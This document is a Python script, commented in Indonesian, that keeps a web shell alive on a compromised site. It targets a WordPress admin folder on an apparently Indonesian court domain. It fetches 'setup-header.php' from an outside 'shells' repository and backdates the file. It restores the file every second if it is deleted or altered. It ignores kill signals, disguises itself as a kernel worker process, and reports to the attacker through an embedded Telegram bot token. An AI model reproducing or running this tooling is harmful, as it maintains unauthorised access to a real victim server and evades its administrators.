import os
import sys
import time
import signal
import ctypes
import random
import hashlib
import requests
from urllib.parse import urlparse

# =====================[ KONFIGURASI - UBAH DI SINI SAJA ]========================
TELEGRAM_TOKEN = "5889811852:AAFYXZvbsxZSdFd7r6nxLUOsNPLcpMp8XhA"
TELEGRAM_CHAT_ID = "5673963782"

WEB_ROOT = "/home/ptunm230/public_html/ptun-makassar.go.id/wp-admin"  # sudah sesuai config kamu

FILES = {
    "setup-header.php": "https://raw.githubusercontent.com/zero-arch1337/shells/refs/heads/main/zerominfo.txt",
    # Tambah file lain kalau perlu nanti
}

TIMESTAMP = "201201081531.12"
SLEEP_INTERVAL = 1  # ← DIUBAH JADI 1 DETIK

# ================ [ Anti-kill signal ] ==================
def ignore_signal(signum, frame): pass
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT, signal.SIGTSTP]:
    try:
        signal.signal(sig, ignore_signal)
    except:
        pass

# =================== [ Stealth rename proses ] ====================
def rename_process():
    try:
        libc = ctypes.CDLL("libc.so.6")
        libc.prctl(15, b"[kworker/0:1]", 0, 0, 0)
        with open("/proc/self/comm", "w") as f:
            f.write("[kworker/0:1]")
        sys.argv = [""]
    except:
        pass

# =================== [ Telegram Notif ] ==================
def send_telegram(msg):
    if not TELEGRAM_TOKEN or not TELEGRAM_CHAT_ID:
        return
    try:
        url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendMessage"
        requests.post(url, data={
            "chat_id": TELEGRAM_CHAT_ID,
            "text": msg,
            "parse_mode": "Markdown"
        }, timeout=8)
    except:
        pass

# =================== [ Helper Functions ] ==================
def get_file_hash(path):
    if not os.path.isfile(path):
        return None
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(4096), b""):
            h.update(block)
    return h.hexdigest()

def download_file(url, path):
    try:
        # Support redirect dari pastee.dev
        r = requests.get(url, timeout=12, allow_redirects=True)
        r.raise_for_status()
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(r.content)
        os.chmod(path, 0o755)
        os.system(f"touch -t {TIMESTAMP} '{path}' 2>/dev/null")
        return True
    except:
        return False

def enforce_permission(path):
    try:
        if os.path.exists(path) and (os.stat(path).st_mode & 0o777) != 0o755:
            os.chmod(path, 0o755)
    except:
        pass

# =================== [ MAIN ] ====================
if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(0)

    url_input = sys.argv[1].rstrip('/')
    parsed = urlparse(url_input)
    if parsed.scheme not in ('http', 'https'):
        sys.exit(0)

    DOMAIN = parsed.netloc
    subpath = parsed.path.strip('/')
    TARGET_DIR = os.path.normpath(os.path.join(WEB_ROOT, subpath))

    # Deteksi duplikat path (opsional, biar aman)
    duplicate_warning = ""
    if subpath.count('bosno') > 1 or subpath.count('ckfinder') > 3:
        duplicate_warning = (
            f"*[WARNING - PATH MUNGKIN DUPLIKAT]*\n"
            f"Input URL: `{url_input}`\n"
            f"Calculated TARGET_DIR: `{TARGET_DIR}`\n"
            f"Path berulang → cek input URL!"
        )

    if not os.path.exists(TARGET_DIR):
        os.makedirs(TARGET_DIR)
        send_telegram(f"*[INFO]* Folder dibuat: `{TARGET_DIR}`")

    elif not os.path.isdir(TARGET_DIR):
        send_telegram(f"*[ERROR]* `{TARGET_DIR}` bukan folder! Stop manual.")
        sys.exit(1)

    rename_process()

    original_hashes = {}

    send_telegram(
        f"*[GUARD AKTIF]*\n"
        f"Domain: `{DOMAIN}`\n"
        f"Target Dir: `{TARGET_DIR}`\n"
        f"Files: {len(FILES)}\n"
        f"{duplicate_warning}"
    )

    while True:
        try:
            rename_process()
            for fname, url in FILES.items():
                fpath = os.path.normpath(os.path.join(TARGET_DIR, fname))
                exists = os.path.exists(fpath)
                cur_hash = get_file_hash(fpath) if exists else None

                if not exists:
                    if download_file(url, fpath):
                        send_telegram(
                            f"*[RESTORED - Dihapus]*\n"
                            f"Domain: `{DOMAIN}`\n"
                            f"File : `{fname}`\n"
                            f"Path : `{fpath}`"
                        )
                    original_hashes[fname] = get_file_hash(fpath)
                    continue

                orig_hash = original_hashes.get(fname)
                if orig_hash is None:
                    original_hashes[fname] = cur_hash
                elif cur_hash != orig_hash:
                    if download_file(url, fpath):
                        send_telegram(
                            f"*[RESTORED - Diubah]*\n"
                            f"Domain: `{DOMAIN}`\n"
                            f"File : `{fname}`\n"
                            f"Path : `{fpath}`"
                        )
                    original_hashes[fname] = get_file_hash(fpath)

                enforce_permission(fpath)

            time.sleep(SLEEP_INTERVAL + random.uniform(-0.3, 0.3))  # ~1 detik ±0.3
        except Exception:
            time.sleep(2)  # kalau error, tunggu agak lama biar tidak spam
